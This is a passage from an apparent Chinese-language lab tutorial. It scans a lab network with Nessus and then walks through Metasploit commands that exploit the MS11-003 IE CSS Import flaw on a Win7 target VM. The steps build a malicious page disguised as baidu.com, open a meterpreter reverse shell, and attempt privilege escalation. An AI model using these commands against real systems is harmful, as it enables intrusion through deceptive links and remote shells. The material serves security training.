配置掃描資訊,主要設定掃描名稱、描述和掃描目標三個資訊即可,其他配置選擇默認,配置完成點擊Save,選擇對整個10.1.1.0/24網段進行掃描,如下圖所示,
圖12 配置Nessus掃描
掃描結束后,Nessus會很直觀的顯示出目標網段的安全情況,下圖顯示了整個網段的安全資訊,Nessus將安全問題歸類為Info/Low/Medium/High/Critical五個等級,其中Critical等級的問題是最危險的,Info級別的問題通常是無關痛癢的資訊顯示問題,
圖13 Nessus掃描網段結果
重點關注10.1.1.129主機,即win7靶機,Nessus掃描出該主機存在四個最高危漏洞、2個高危漏洞及其它漏洞問題,
圖14 10.1.1.129主機漏洞概況
選中高危漏洞,Nessus給出了該漏洞的介紹、風險資訊、解決方案等詳細資訊,Risk information對于攻擊者來說非常有用,可以根據Risk information去Google搜索是否存在已知的漏洞利用Exp,
圖15 MS11-030漏洞詳情
實驗二中掃描得到win7主機系統存在MS11_030決議漏洞,但是該漏洞利用條件較為苛刻,因此選擇MS11_003 IE CSS Import漏洞來演示如何通過誘騙攻擊者點擊我們精心構造的含有攻擊代碼的網頁來實作系統入侵,
1.在kali中執行“msfconsole”,啟動metasploit
2.運行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP
3.運行命令:show options,查看配置選項
4.設定生成的惡意網頁的URI為baidu.com
運行命令:set URIPATH baidu.com
5.為防止服務器埠沖突,設定服務器埠為8060,避開常用埠8080
運行命令:set SRVPORT 8060
6.設定攻擊負載
運行命令:set PAYLOAD windows/meterpreter/reverse_tcp
7.查看配置選項
運行命令: show options
8.設定LHOST以系結本地IP
set LHOST 10.1.1.128
9.為避免沖突設定LPORT
運行命令:set LPORT 8866
10.運行命令“exploit”開始進行攻擊,生成惡意網頁和做好其他準備,只等受害者訪問我們構造的惡意網頁
11.在 Win7靶機打開IE,訪問http://10.1.1.128:8060/baidu.com,模擬受害者誤點擊網頁,靶機IE如下圖所示,攻擊者Metasploit顯示如下圖所示資訊表明攻擊成功,
12 驗證攻擊是否成功,列出當前成功建立的回話,任意進入一個回話,查看攻擊者的身份,可以嘗試使用getsystem進行進一步的提權,如果提權失敗則可以采取上傳提權exe程式進行提權的方案獲得最高權限,
sessions 列出所有會話
sessions -i 1 進入1號會話
getuid 查看當前用戶
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/240018.html
標籤:其他
上一篇:利用自定義注解和攔截器為資訊安全存在問題的老Java Web系統添加鑒權能力
下一篇:小白的第一次sql踩坑記